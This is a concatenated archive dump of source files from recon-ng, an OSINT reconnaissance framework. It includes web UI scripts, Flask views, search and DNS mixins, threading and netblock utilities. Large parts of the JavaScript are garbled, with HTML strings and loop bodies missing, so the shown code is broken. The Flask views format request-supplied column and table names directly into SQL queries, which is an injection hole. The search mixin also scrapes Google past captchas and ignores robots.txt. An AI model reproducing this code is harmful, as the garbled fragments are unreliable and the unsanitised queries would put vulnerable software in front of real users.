  • ").appendTo($("#reports-list")); var a = $("").attr("href", "javascript:void(0)").text(reports[i]).appendTo(li); }); } function createColumnFilter(columns) { // clear existing elements $("#columns-list").empty(); // add DOM elements based on the provided column names $("#columns-list").append('
    Fields:
    '); $.each(columns, function(i, v) { var div = $("
    ").addClass("ck-button").appendTo($("#columns-list")); var label = $("
  • ").appendTo($("#exports-list")); var a = $("").attr("href", "javascript:void(0)").text(v).appendTo(li); }); } function createDataTable(rows) { // clear existing elements $("#data-table").empty(); // add DOM elements based on the provided rows if (rows.length > 0) { var table = $("", {id: "sorttable"}).addClass("sortable").addClass("center").appendTo($("#data-table")); // build the table header var thead = $("").appendTo(table); var tr = $("").appendTo(thead); $.each(rows[0], function(i, v) { var th = $("").appendTo(table); $.each(rows, function(i, row) { var tr = $("").appendTo(tbody); $.each(row, function(i, v) { var td = $("
    ").addClass("no-select").text(i).appendTo(tr); }); // build the table body var tbody = $("
    ").text(v).appendTo(tr); }); }); sorttable.makeSortable($("#sorttable")[0]); } else { $("#data-table").append("
    No Data.
    "); } } function setSelectWidth(select) { $("#templateOption").text(select.val()); // for some reason, a small fudge factor may be needed // so that the text doesn't become clipped * 1.03+"px" select.css("width", $("#template")[0].offsetWidth*1.03+"px"); } $(".tooltip").hover( function() { var tooltipText = $(this).find(".tooltiptext"); var left = $(this).offset().left + $(this).outerWidth()/2 - tooltipText.outerWidth()/2; var top = $(this).offset().top - tooltipText.outerHeight() - 5; tooltipText.css({left: left, top: top}); }, function() { return; } ); //$(window).resize(function(){ function setFillHeight() { $(".fill").each(function(index) { $(this).css({height: $(window).height() - $("#template").outerHeight() - $(this).offset().top - 10}); }); } $(document).ready(function() { // force a load of the initial workspace $("#workspace").trigger("change"); $("#nav").css("visibility", "visible"); }); LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/skeleton.css000066400000000000000000000262741312265724400246270ustar00rootroot00000000000000/* * Skeleton V2.0.4 * Copyright 2014, Dave Gamache * www.getskeleton.com * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php * 12/29/2014 */ /* Table of contents –––––––––––––––––––––––––––––––––––––––––––––––––– - Grid - Base Styles - Typography - Links - Buttons - Forms - Lists - Code - Tables - Spacing - Utilities - Clearing - Media Queries */ /* Grid –––––––––––––––––––––––––––––––––––––––––––––––––– */ .container { position: relative; width: 100%; max-width: 960px; margin: 0 auto; padding: 0 20px; box-sizing: border-box; } .column, .columns { width: 100%; float: left; box-sizing: border-box; } /* For devices larger than 400px */ @media (min-width: 400px) { .container { width: 85%; padding: 0; } } /* For devices larger than 550px */ @media (min-width: 550px) { .container { width: 80%; } .column, .columns { margin-left: 4%; } .column:first-child, .columns:first-child { margin-left: 0; } .one.column, .one.columns { width: 4.66666666667%; } .two.columns { width: 13.3333333333%; } .three.columns { width: 22%; } .four.columns { width: 30.6666666667%; } .five.columns { width: 39.3333333333%; } .six.columns { width: 48%; } .seven.columns { width: 56.6666666667%; } .eight.columns { width: 65.3333333333%; } .nine.columns { width: 74.0%; } .ten.columns { width: 82.6666666667%; } .eleven.columns { width: 91.3333333333%; } .twelve.columns { width: 100%; margin-left: 0; } .one-third.column { width: 30.6666666667%; } .two-thirds.column { width: 65.3333333333%; } .one-half.column { width: 48%; } /* Offsets */ .offset-by-one.column, .offset-by-one.columns { margin-left: 8.66666666667%; } .offset-by-two.column, .offset-by-two.columns { margin-left: 17.3333333333%; } .offset-by-three.column, .offset-by-three.columns { margin-left: 26%; } .offset-by-four.column, .offset-by-four.columns { margin-left: 34.6666666667%; } .offset-by-five.column, .offset-by-five.columns { margin-left: 43.3333333333%; } .offset-by-six.column, .offset-by-six.columns { margin-left: 52%; } .offset-by-seven.column, .offset-by-seven.columns { margin-left: 60.6666666667%; } .offset-by-eight.column, .offset-by-eight.columns { margin-left: 69.3333333333%; } .offset-by-nine.column, .offset-by-nine.columns { margin-left: 78.0%; } .offset-by-ten.column, .offset-by-ten.columns { margin-left: 86.6666666667%; } .offset-by-eleven.column, .offset-by-eleven.columns { margin-left: 95.3333333333%; } .offset-by-one-third.column, .offset-by-one-third.columns { margin-left: 34.6666666667%; } .offset-by-two-thirds.column, .offset-by-two-thirds.columns { margin-left: 69.3333333333%; } .offset-by-one-half.column, .offset-by-one-half.columns { margin-left: 52%; } } /* Base Styles –––––––––––––––––––––––––––––––––––––––––––––––––– */ /* NOTE html is set to 62.5% so that all the REM measurements throughout Skeleton are based on 10px sizing. So basically 1.5rem = 15px :) */ html { font-size: 62.5%; } body { font-size: 1.5em; /* currently ems cause chrome bug misinterpreting rems on body element */ line-height: 1.6; font-weight: 400; font-family: "Raleway", "HelveticaNeue", "Helvetica Neue", Helvetica, Arial, sans-serif; color: #222; } /* Typography –––––––––––––––––––––––––––––––––––––––––––––––––– */ h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: 2rem; font-weight: 300; } h1 { font-size: 4.0rem; line-height: 1.2; letter-spacing: -.1rem;} h2 { font-size: 3.6rem; line-height: 1.25; letter-spacing: -.1rem; } h3 { font-size: 3.0rem; line-height: 1.3; letter-spacing: -.1rem; } h4 { font-size: 2.4rem; line-height: 1.35; letter-spacing: -.08rem; } h5 { font-size: 1.8rem; line-height: 1.5; letter-spacing: -.05rem; } h6 { font-size: 1.5rem; line-height: 1.6; letter-spacing: 0; } /* Larger than phablet */ @media (min-width: 550px) { h1 { font-size: 5.0rem; } h2 { font-size: 4.2rem; } h3 { font-size: 3.6rem; } h4 { font-size: 3.0rem; } h5 { font-size: 2.4rem; } h6 { font-size: 1.5rem; } } p { margin-top: 0; } /* Links –––––––––––––––––––––––––––––––––––––––––––––––––– */ a { color: #1EAEDB; } a:hover { color: #0FA0CE; } /* Buttons –––––––––––––––––––––––––––––––––––––––––––––––––– */ .button, button, input[type="submit"], input[type="reset"], input[type="button"] { display: inline-block; height: 38px; padding: 0 30px; color: #555; text-align: center; font-size: 11px; font-weight: 600; line-height: 38px; letter-spacing: .1rem; text-transform: uppercase; text-decoration: none; white-space: nowrap; background-color: transparent; border-radius: 4px; border: 1px solid #bbb; cursor: pointer; box-sizing: border-box; } .button:hover, button:hover, input[type="submit"]:hover, input[type="reset"]:hover, input[type="button"]:hover, .button:focus, button:focus, input[type="submit"]:focus, input[type="reset"]:focus, input[type="button"]:focus { color: #333; border-color: #888; outline: 0; } .button.button-primary, button.button-primary, input[type="submit"].button-primary, input[type="reset"].button-primary, input[type="button"].button-primary { color: #FFF; background-color: #33C3F0; border-color: #33C3F0; } .button.button-primary:hover, button.button-primary:hover, input[type="submit"].button-primary:hover, input[type="reset"].button-primary:hover, input[type="button"].button-primary:hover, .button.button-primary:focus, button.button-primary:focus, input[type="submit"].button-primary:focus, input[type="reset"].button-primary:focus, input[type="button"].button-primary:focus { color: #FFF; background-color: #1EAEDB; border-color: #1EAEDB; } /* Forms –––––––––––––––––––––––––––––––––––––––––––––––––– */ input[type="email"], input[type="number"], input[type="search"], input[type="text"], input[type="tel"], input[type="url"], input[type="password"], textarea, select { height: 38px; padding: 6px 10px; /* The 6px vertically centers text on FF, ignored by Webkit */ background-color: #fff; border: 1px solid #D1D1D1; border-radius: 4px; box-shadow: none; box-sizing: border-box; } /* Removes awkward default styles on some inputs for iOS */ input[type="email"], input[type="number"], input[type="search"], input[type="text"], input[type="tel"], input[type="url"], input[type="password"], textarea { -webkit-appearance: none; -moz-appearance: none; appearance: none; } textarea { min-height: 65px; padding-top: 6px; padding-bottom: 6px; } input[type="email"]:focus, input[type="number"]:focus, input[type="search"]:focus, input[type="text"]:focus, input[type="tel"]:focus, input[type="url"]:focus, input[type="password"]:focus, textarea:focus, select:focus { border: 1px solid #33C3F0; outline: 0; } label, legend { display: block; margin-bottom: .5rem; font-weight: 600; } fieldset { padding: 0; border-width: 0; } input[type="checkbox"], input[type="radio"] { display: inline; } label > .label-body { display: inline-block; margin-left: .5rem; font-weight: normal; } /* Lists –––––––––––––––––––––––––––––––––––––––––––––––––– */ ul { list-style: circle inside; } ol { list-style: decimal inside; } ol, ul { padding-left: 0; margin-top: 0; } ul ul, ul ol, ol ol, ol ul { margin: 1.5rem 0 1.5rem 3rem; font-size: 90%; } li { margin-bottom: 1rem; } /* Code –––––––––––––––––––––––––––––––––––––––––––––––––– */ code { padding: .2rem .5rem; margin: 0 .2rem; font-size: 90%; white-space: nowrap; background: #F1F1F1; border: 1px solid #E1E1E1; border-radius: 4px; } pre > code { display: block; padding: 1rem 1.5rem; white-space: pre; } /* Tables –––––––––––––––––––––––––––––––––––––––––––––––––– */ th, td { padding: 12px 15px; text-align: left; border-bottom: 1px solid #E1E1E1; } th:first-child, td:first-child { padding-left: 0; } th:last-child, td:last-child { padding-right: 0; } /* Spacing –––––––––––––––––––––––––––––––––––––––––––––––––– */ button, .button { margin-bottom: 1rem; } input, textarea, select, fieldset { margin-bottom: 1.5rem; } pre, blockquote, dl, figure, table, p, ul, ol, form { margin-bottom: 2.5rem; } /* Utilities –––––––––––––––––––––––––––––––––––––––––––––––––– */ .u-full-width { width: 100%; box-sizing: border-box; } .u-max-full-width { max-width: 100%; box-sizing: border-box; } .u-pull-right { float: right; } .u-pull-left { float: left; } /* Misc –––––––––––––––––––––––––––––––––––––––––––––––––– */ hr { margin-top: 3rem; margin-bottom: 3.5rem; border-width: 0; border-top: 1px solid #E1E1E1; } /* Clearing –––––––––––––––––––––––––––––––––––––––––––––––––– */ /* Self Clearing Goodness */ .container:after, .row:after, .u-cf { content: ""; display: table; clear: both; } /* Media Queries –––––––––––––––––––––––––––––––––––––––––––––––––– */ /* Note: The best way to structure the use of media queries is to create the queries near the relevant code. For example, if you wanted to change the styles for buttons on small devices, paste the mobile query code up in the buttons section and style it there. */ /* Larger than mobile */ @media (min-width: 400px) {} /* Larger than phablet (also point when grid becomes active) */ @media (min-width: 550px) {} /* Larger than tablet */ @media (min-width: 750px) {} /* Larger than desktop */ @media (min-width: 1000px) {} /* Larger than Desktop HD */ @media (min-width: 1200px) {} LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/sorttable.js000066400000000000000000000412031312265724400246130ustar00rootroot00000000000000/* SortTable version 2 7th April 2007 Stuart Langridge, http://www.kryogenix.org/code/browser/sorttable/ Instructions: Download this file Add to your HTML Add class="sortable" to any table you'd like to make sortable Click on the headers to sort Thanks to many, many people for contributions and suggestions. Licenced as X11: http://www.kryogenix.org/code/browser/licence.html This basically means: do what you want with it. */ /* jshint -W051, -W083, -W027 */ var stIsIE = /*@cc_on!@*/false; sorttable = { init: function() { // quit if this function has already been called if (arguments.callee.done) return; // flag this function so we don't do the same thing twice arguments.callee.done = true; // kill the timer if (_timer) clearInterval(_timer); if (!document.createElement || !document.getElementsByTagName) return; sorttable.DATE_RE = /^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/; forEach(document.getElementsByTagName('table'), function(table) { if (table.className.search(/\bsortable\b/) != -1) { sorttable.makeSortable(table); } }); }, makeSortable: function(table) { if (table.getElementsByTagName('thead').length === 0) { // table doesn't have a tHead. Since it should have, create one and // put the first table row in it. the = document.createElement('thead'); the.appendChild(table.rows[0]); table.insertBefore(the,table.firstChild); } // Safari doesn't support table.tHead, sigh if (table.tHead === null) table.tHead = table.getElementsByTagName('thead')[0]; if (table.tHead.rows.length != 1) return; // can't cope with two header rows // Sorttable v1 put rows with a class of "sortbottom" at the bottom (as // "total" rows, for example). This is B&R, since what you're supposed // to do is put them in a tfoot. So, if there are sortbottom rows, // for backwards compatibility, move them to tfoot (creating it if needed). sortbottomrows = []; for (var i=0; i5' : ' ▴'; this.appendChild(sortrevind); return; } if (this.className.search(/\bsorttable_sorted_reverse\b/) != -1) { // if we're already sorted by this column in reverse, just // re-reverse the table, which is quicker sorttable.reverse(this.sorttable_tbody); this.className = this.className.replace('sorttable_sorted_reverse', 'sorttable_sorted'); this.removeChild(document.getElementById('sorttable_sortrevind')); sortfwdind = document.createElement('span'); sortfwdind.id = "sorttable_sortfwdind"; sortfwdind.innerHTML = stIsIE ? ' 6' : ' ▾'; this.appendChild(sortfwdind); return; } // remove sorttable_sorted classes theadrow = this.parentNode; forEach(theadrow.childNodes, function(cell) { if (cell.nodeType == 1) { // an element cell.className = cell.className.replace('sorttable_sorted_reverse',''); cell.className = cell.className.replace('sorttable_sorted',''); } }); sortfwdind = document.getElementById('sorttable_sortfwdind'); if (sortfwdind) { sortfwdind.parentNode.removeChild(sortfwdind); } sortrevind = document.getElementById('sorttable_sortrevind'); if (sortrevind) { sortrevind.parentNode.removeChild(sortrevind); } this.className += ' sorttable_sorted'; sortfwdind = document.createElement('span'); sortfwdind.id = "sorttable_sortfwdind"; sortfwdind.innerHTML = stIsIE ? ' 6' : ' ▾'; this.appendChild(sortfwdind); // build an array to sort. This is a Schwartzian transform thing, // i.e., we "decorate" each row with the actual sort key, // sort based on the sort keys, and then put the rows back in order // which is a lot faster because you only do getInnerText once per row row_array = []; col = this.sorttable_columnindex; rows = this.sorttable_tbody.rows; for (var j=0; j 12) { // definitely dd/mm return sorttable.sort_ddmm; } else if (second > 12) { return sorttable.sort_mmdd; } else { // looks like a date, but we can't tell which, so assume // that it's dd/mm (English imperialism!) and keep looking sortfn = sorttable.sort_ddmm; } } } } return sortfn; }, getInnerText: function(node) { // gets the text we want to use for sorting for a cell. // strips leading and trailing whitespace. // this is *not* a generic getInnerText function; it's special to sorttable. // for example, you can override the cell text with a customkey attribute. // it also gets .value for fields. if (!node) return ""; hasInputs = (typeof node.getElementsByTagName == 'function') && node.getElementsByTagName('input').length; if (node.nodeType == 1 && node.getAttribute("sorttable_customkey") !== null) { return node.getAttribute("sorttable_customkey"); } else if (typeof node.textContent != 'undefined' && !hasInputs) { return node.textContent.replace(/^\s+|\s+$/g, ''); } else if (typeof node.innerText != 'undefined' && !hasInputs) { return node.innerText.replace(/^\s+|\s+$/g, ''); } else if (typeof node.text != 'undefined' && !hasInputs) { return node.text.replace(/^\s+|\s+$/g, ''); } else { switch (node.nodeType) { case 3: if (node.nodeName.toLowerCase() == 'input') { return node.value.replace(/^\s+|\s+$/g, ''); } break; case 4: return node.nodeValue.replace(/^\s+|\s+$/g, ''); break; case 1: case 11: var innerText = ''; for (var i = 0; i < node.childNodes.length; i++) { innerText += sorttable.getInnerText(node.childNodes[i]); } return innerText.replace(/^\s+|\s+$/g, ''); break; default: return ''; } } }, reverse: function(tbody) { // reverse the rows in a tbody newrows = []; for (var i=0; i=0; i--) { tbody.appendChild(newrows[i]); } delete newrows; }, /* sort functions each sort function takes two parameters, a and b you are comparing a[0] and b[0] */ sort_numeric: function(a,b) { aa = parseFloat(a[0].replace(/[^0-9.-]/g,'')); if (isNaN(aa)) aa = 0; bb = parseFloat(b[0].replace(/[^0-9.-]/g,'')); if (isNaN(bb)) bb = 0; return aa-bb; }, sort_alpha: function(a,b) { return a[0].localeCompare(b[0]); /* if (a[0]==b[0]) return 0; if (a[0] 0 ) { q = list[i]; list[i] = list[i+1]; list[i+1] = q; swap = true; } } // for t--; if (!swap) break; for(i = t; i > b; --i) { if ( comp_func(list[i], list[i-1]) < 0 ) { q = list[i]; list[i] = list[i-1]; list[i-1] = q; swap = true; } } // for b++; } // while(swap) } }; /* ****************************************************************** Supporting functions: bundled here to avoid depending on a library ****************************************************************** */ // Dean Edwards/Matthias Miller/John Resig /* for Mozilla/Opera9 */ if (document.addEventListener) { document.addEventListener("DOMContentLoaded", sorttable.init, false); } /* for Internet Explorer */ /*@cc_on @*/ /*@if (@_win32) document.write("
      select a table
      Tables:
        harvested items
        module activity
        filter data by columns
        export filtered data
        Export:
          LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/templates/pushpin.html000066400000000000000000000026411312265724400253440ustar00rootroot00000000000000 Pushpin
          workspace
          {{ session.workspace }}
          sources
          Loading pushpins...
          LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/utils.py000066400000000000000000000075121312265724400225060ustar00rootroot00000000000000from flask import g, session from recon.core.web import app from sqlite3 import dbapi2 as sqlite3 import os import re # import statement to be leveraged by other modules try: from cStringIO import StringIO except: from StringIO import StringIO def debug(str): if app.config['DEBUG']: for line in str.split('\n'): print('[DEBUG] '+line) def get_workspaces(): dirnames = [] path = os.path.join(app.config['HOME_DIR'], 'workspaces') for name in os.listdir(path): if os.path.isdir(os.path.join(path, name)): dirnames.append(name) return dirnames def get_tables(): tables = query('SELECT name FROM sqlite_master WHERE type=\'table\'') return sorted(tables, key=lambda t: t['name']) def get_columns(table): return [x[1] for x in query('PRAGMA table_info(\'{}\')'.format(table))] def connect_db(): '''Connects to the specific database.''' rv = sqlite3.connect(session['database']) rv.row_factory = sqlite3.Row return rv def get_db(): '''Opens a new database connection if there is none yet for the current application context.''' if not hasattr(g, 'sqlite_db'): g.sqlite_db = connect_db() debug('Database connection created.') return g.sqlite_db @app.teardown_appcontext def close_db(error): '''Closes the database again at the end of the request.''' if hasattr(g, 'sqlite_db'): g.sqlite_db.close() debug('Database connection destroyed.') def query(query, values=()): '''Queries the database and returns the results as a list.''' db = get_db() debug('Query: {}'.format(query)) if values: cur = db.execute(query, values) else: cur = db.execute(query) return cur.fetchall() def add_worksheet(workbook, name, rows): '''Helper function for building xlsx files.''' worksheet = workbook.add_worksheet(name) # build the data set if rows: _rows = [rows[0].keys()] for row in rows: _row = [] for key in _rows[0]: _row.append(row[key]) _rows.append(_row) # write the rows of data to the xlsx file for r in range(0, len(_rows)): for c in range(0, len(_rows[r])): worksheet.write(r, c, _rows[r][c]) def is_url(s): ip_middle_octet = u"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5]))" ip_last_octet = u"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))" regex = re.compile( u"^" # protocol identifier u"(?:(?:https?|ftp)://)" # user:pass authentication u"(?:\S+(?::\S*)?@)?" u"(?:" u"(?P" # IP address exclusion # private & local networks u"(?:(?:10|127)" + ip_middle_octet + u"{2}" + ip_last_octet + u")|" u"(?:(?:169\.254|192\.168)" + ip_middle_octet + ip_last_octet + u")|" u"(?:172\.(?:1[6-9]|2\d|3[0-1])" + ip_middle_octet + ip_last_octet + u"))" u"|" # IP address dotted notation octets # excludes loopback network 0.0.0.0 # excludes reserved space >= 224.0.0.0 # excludes network & broadcast addresses # (first & last IP address of each class) u"(?P" u"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])" u"" + ip_middle_octet + u"{2}" u"" + ip_last_octet + u")" u"|" # host name u"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)" # domain name u"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*" # TLD identifier u"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" u")" # port number u"(?::\d{2,5})?" # resource path u"(?:/\S*)?" # query string u"(?:\?\S*)?" u"$", re.UNICODE | re.IGNORECASE ) pattern = re.compile(regex) if pattern.match(s): return True return False LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/views.py000066400000000000000000000044521312265724400225030ustar00rootroot00000000000000from flask import jsonify, render_template, request, session from recon.core.web import app from recon.core.web.utils import get_workspaces, get_tables, get_columns, query from recon.core.web.exports import csvify, xmlify, listify, xlsxify, proxify from recon.core.web.reports import pushpin, xlsx EXPORTS = { 'json': jsonify, 'xml': xmlify, 'csv': csvify, 'list': listify, 'xlsx': xlsxify, 'proxy': proxify, } REPORTS = { 'pushpin': pushpin, 'xlsx': xlsx, } @app.route('/') def index(): return render_template('index.html', workspaces=get_workspaces()) @app.route('/api/workspaces/') @app.route('/api/workspaces/.') def api_workspace(workspace, report=''): # set/update session data for the current workspace session['database'] = app.config['DATABASE'].format(workspace) session['workspace'] = workspace # dynamically determine and call reporting function if report and report in REPORTS: return REPORTS[report]() # build the summary data tables = [dict(t) for t in get_tables()] dashboard = query('SELECT * FROM dashboard') modules = [dict(r) for r in dashboard] records = [] for table in tables: name = table['name'] count = query('SELECT COUNT(*) AS \'COUNT\' FROM {}'.format(name)) records.append({'name': name, 'count':count[0]['COUNT']}) summary = { 'records': sorted(records, key=lambda r: r['count'], reverse=True), 'modules': sorted(modules, key=lambda m: m['runs'], reverse=True), } return jsonify(tables=tables, summary=summary, reports=REPORTS.keys()) @app.route('/api/workspaces//tables/') @app.route('/api/workspaces//tables/.') def api_table(workspace, table, format=''): # filter rows for columns if needed columns = request.values.get('columns') if columns: rows = query('SELECT {} FROM {}'.format(columns, table)) else: rows = query('SELECT * FROM {}'.format(table)) # dynamically determine and call export function if format and format in EXPORTS: return EXPORTS[format](rows=[dict(r) for r in rows]) return jsonify(rows=[dict(r) for r in rows], columns=get_columns(table), exports=EXPORTS.keys()) LaNMaSteR53-recon-ng-70d967e3f530/recon/mixins/000077500000000000000000000000001312265724400205715ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/mixins/__init__.py000066400000000000000000000000001312265724400226700ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/mixins/browser.py000066400000000000000000000015461312265724400226340ustar00rootroot00000000000000import mechanize import socket class BrowserMixin(object): def get_browser(self): '''Returns a mechanize.Browser object configured with the framework's global options.''' br = mechanize.Browser() # set the user-agent header br.addheaders = [('User-agent', self._global_options['user-agent'])] # set debug options if self._global_options['verbosity'] >= 2: br.set_debug_http(True) br.set_debug_redirects(True) br.set_debug_responses(True) # set proxy if self._global_options['proxy']: br.set_proxies({'http': self._global_options['proxy'], 'https': self._global_options['proxy']}) # additional settings br.set_handle_robots(False) # set timeout socket.setdefaulttimeout(self._global_options['timeout']) return br LaNMaSteR53-recon-ng-70d967e3f530/recon/mixins/resolver.py000066400000000000000000000005411312265724400230040ustar00rootroot00000000000000import dns class ResolverMixin(object): def get_resolver(self): '''Returns a dnspython default resolver object configured with the framework's global options.''' resolver = dns.resolver.get_default_resolver() resolver.nameservers = [self._global_options['nameserver']] resolver.lifetime = 3 return resolver LaNMaSteR53-recon-ng-70d967e3f530/recon/mixins/search.py000066400000000000000000000077721312265724400224250ustar00rootroot00000000000000from lxml.html import fromstring from cookielib import CookieJar import os import re import tempfile import urllib import webbrowser class GoogleWebMixin(object): cookiejar = CookieJar() user_agent = 'Lynx/2.8.8dev.3 libwww-FM/2.14 SSL-MM/1.4.1' def search_google_web(self, query, limit=0, start_page=1): # parsing logic based on https://github.com/maurosoria/s3arch url = 'https://www.google.com/search' num = 100 page = start_page set_page = lambda x: (x - 1) * num payload = {'q':query, 'start':set_page(page), 'num':num, 'complete':0} results = [] self.verbose('Searching Google for: %s' % (query)) while True: #resp = None # google errors out at > 2061 characters not including the protocol # 21 (resource-proto) + 1 (?) + 8 (num) + 11 (complete) + 7 + len(start) + 3 + len(encoded(query)) #max_len = 2061 - 21 - 1 - 8 - 11 - 7 - len(payload['start']) - 3 #if len(urllib.quote_plus(query)) > max_len: query = query[:max_len] resp = self.request(url, payload=payload, redirect=False, cookiejar=self.cookiejar, agent=self.user_agent) # detect and handle captchas until answered correctly # first visit = 302, actual captcha = 503 # follow the redirect to the captcha count = 0 while resp.status_code == 302: redirect = resp.headers['location'] # request the captcha page resp = self.request(redirect, redirect=False, cookiejar=self.cookiejar, agent=self.user_agent) count += 1 # account for the possibility of infinite redirects if count == 20: break # handle the captcha # check needed because the redirect could result in an error # will properly exit the loop and fall to the error check below if resp.status_code == 503: resp = self._solve_google_captcha(resp) continue # handle error conditions if resp.status_code != 200: self.error('Google encountered an unknown error.') break tree = fromstring(resp.text) links = tree.xpath('//a/@href') regmatch = re.compile('^/url\?q=[^/]') for link in links: if regmatch.match(link) != None and 'http://webcache.googleusercontent.com' not in link: results.append(urllib.unquote_plus(link[7:link.find('&')])) # check limit if limit == page: break page += 1 payload['start'] = set_page(page) # check for more pages if '>Next %s started.' % thread_name) while not self.stopped.is_set(): try: # use the get_nowait() method for retrieving a queued item to # prevent the thread from blocking when the queue is empty obj = self.q.get_nowait() except Empty: continue try: # launch the public module_thread method self.module_thread(obj, *args) except: # handle exceptions local to the thread self.print_exception('(thread=%s, object=%s)' % (thread_name, repr(obj))) finally: self.q.task_done() self.debug('THREAD => %s exited.' % thread_name) # sometimes a keyboardinterrupt causes a race condition between when the self.q.task_done() call above and the # self.q.empty() call below, causing all the threads to hang. introducing the time.sleep(.7) call below reduces # the likelihood of encountering the race condition. def thread(self, *args): # disable threading in debug mode if self._global_options['verbosity'] >= 2: # call the thread method in serial for each input for item in args[0]: self.module_thread(item, *args[1:]) return # begin threading code thread_count = self._global_options['threads'] self.stopped = threading.Event() self.exc_info = None self.q = Queue() # populate the queue from the user-defined iterable. should be done # before the threads start so they have something to process right away for item in args[0]: self.q.put(item) # launch the threads threads = [] for i in range(thread_count): t = threading.Thread(target=self._thread_wrapper, args=args[1:]) threads.append(t) t.setDaemon(True) t.start() # hack to catch keyboard interrupts try: while not self.q.empty(): time.sleep(.7) except KeyboardInterrupt: self.error('Ok. Waiting for threads to exit...') # set the event flag to trigger an exit for all threads (interrupt condition) self.stopped.set() # prevent the module from returning to the interpreter until all threads have exited for t in threads: t.join() raise self.q.join() # set the event flag to trigger an exit for all threads (normal condition) # the threads are no longer needed once all the data has been processed self.stopped.set() LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/000077500000000000000000000000001312265724400204225ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/__init__.py000066400000000000000000000000001312265724400225210ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/crypto.py000066400000000000000000000003041312265724400223110ustar00rootroot00000000000000import aes def aes_decrypt(ciphertext, key, iv): decoded = ciphertext.decode('base64') password = aes.decryptData(key, iv.encode('utf-8') + decoded) return unicode(password, 'utf-8') LaNMaSteR53-recon-ng-70d967e3f530/recon/utils/netblock.py000066400000000000000000000115561312265724400226050ustar00rootroot00000000000000# # python code to play around with netblocks. # # NOTEZ BIEN: use of long integers is deliberate, because it insures that # various comparisons work right (eg 'low < high', when low has the high # bit clear and high has it set). import string import ranges # mask off 32 bits. B32M = 0xffffffffL def m32(n): """Mask a number to 32 bits.""" return n & B32M def lenmask(len): """Return the mask for a given network length""" return m32(-(1L<<(32-len))) def cidrrange((addr, len)): """Given an IP address and a network size, return the low and high addresses in it.""" m = lenmask(len) # the low end is addr & mask (to make sure no funny business is going # on) l = addr&m # the high end is the low end plus the maximum span of the mask: h = l + m32(~0 ^ m) return (l, h) def strtoip(ipstr): """convert an IP address in string form to numeric.""" res = 0L count = 0 n = string.split(ipstr, '.') for i in n: res = res << 8L ot = string.atoi(i) if ot < 0 or ot > 255: raise ValueError, "invalid IP octet" res = res + ot count = count + 1 # could be incomplete (short); make it complete. while count < 4: res = res << 8L count = count + 1 return res def strtocidr(ips): """returns CIDR start + length from string""" rng = 32 pos = string.find(ips, '/') if not pos == -1: rng = string.atoi(ips[pos+1:]) ips = ips[:pos] if string.find(ips, '.') == -1: ip = string.atol(ips) else: ip = strtoip(ips) if rng < 0 or rng > 32: raise ValueError, "CIDR length out of range" return (ip, rng) def cidrtostr(ip, len): if len == 32: return iptostr(ip) else: return '%s/%d' % (iptostr(ip), len) def octet(ip, n): """get octet n (0-3) of ip address ip. 0 is the first (left) octet.""" s = (3-n) * 8 return (ip >> s) & 0xff def iptostr(ip): """Convert IP number to string form""" o1, o2, o3, o4 = octet(ip,0), octet(ip,1), octet(ip,2), octet(ip,3) return '%d.%d.%d.%d' % (o1, o2, o3, o4) def ffs(n): """find first set bit in a 32-bit number""" r = 0 while r < 32: if (1<= 0: (lt, ht) = cidrrange((lip, (32-lb))) if lt == lip and ht <= hip: break lb = lb - 1 if lb < 0: raise ArithmeticError, "something horribly wrong" r.append((lip, (32-lb))) lip = ht+1 return r # This class handles network blocks. class IpAddrRanges(ranges.Ranges): """Sets of IP address ranges. All IP address arguments are supplied as strings.""" def __init__(self): ranges.Ranges.__init__(self) # debugging routine to dump raw contents in comprehensible form. def _dump(self): return map(lambda x: (iptostr(x[0]), iptostr(x[1])), self._l) def addcidr(self, ipstr): """Add CIDR IP address range to the set.""" (low, high) = cidrrange(strtocidr(ipstr)) self.add(low, high) def addipr(self, i1, i2): """Add all IP addresses between LOW and HIGH to the set.""" low, high = strtoip(i1), strtoip(i2) self.add(low, high) def remcidr(self, ipstr): """Remove CIDR IP address range from the set.""" (low, high) = cidrrange(strtocidr(ipstr)) self.remove(low, high) def remipr(self, i1, i2): """Remove all IP addresses between LOW and HIGH from the set.""" low, high = strtoip(i1), strtoip(i2) self.remove(i1, i2) def dumpnbstrs(self): """Dump the contents of the set as a list of CIDR IP netblocks""" l = [] for i in self._l: l = l + lhcidrs(i[0], i[1]) return map(lambda x: cidrtostr(x[0], x[1]), l) def addstr(self, str): """Add a string representing an IP address or CIDR range to us.""" pos = string.find(str, '-') if pos == -1: self.addcidr(str) else: self.addipr(str[:pos], str[pos+1:]) # Validate a string as a CIDR netblock or IP address. import re cvalid = re.compile('^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(/\d{1,2})?$') def cidrstrerr(str): """Check an IP address or CIDR netblock for validity. Returns None if it is and otherwise an error string.""" if not cvalid.match(str): return 'Not a syntatically valid IP address or netblock' rng = 32 pos = string.find(str, '/') ips = str if not pos == -1: rng = string.atoi(ips[pos+1:]) ips = str[:pos] if rng < 0 or rng > 32: return 'CIDR length out of range' n = string.split(ips, '.') for i in n: ip = string.atoi(i) if (ip < 0 or ip > 255): return 'an IP octet is out of range' # could check to see if it is 'proper', but. return None def cidrproper(str): (ip, rng) = strtocidr(str) (l, h) = cidrrange((ip, rng)) if l != ip: return None else: return 1 